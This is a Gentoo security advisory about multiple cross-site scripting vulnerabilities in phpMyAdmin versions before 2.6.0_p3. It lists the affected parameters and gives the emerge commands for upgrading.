phpMyAdmin: Multiple XSS vulnerabilities — GLSA 200411-36

phpMyAdmin is vulnerable to cross-site scripting attacks.

Affected packages

dev-db/phpmyadmin on all architectures
Affected versions < 2.6.0_p3
Unaffected versions >= 2.6.0_p3

Background

phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL databases from a web-browser.

Description

Cedric Cochin has discovered multiple cross-site scripting vulnerabilities in phpMyAdmin. These vulnerabilities can be exploited through the PmaAbsoluteUri parameter, the zero_rows parameter in read_dump.php, the confirm form, or an error message generated by the internal phpMyAdmin parser.

Impact

By sending a specially-crafted request, an attacker can inject and execute malicious script code, potentially compromising the victim's browser.

Workaround

There is no known workaround at this time.

Resolution

All phpMyAdmin users should upgrade to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.0_p3"

References

Release date
November 27, 2004

Latest revision
November 27, 2004: 01

Severity
low

Exploitable
remote

Bugzilla entries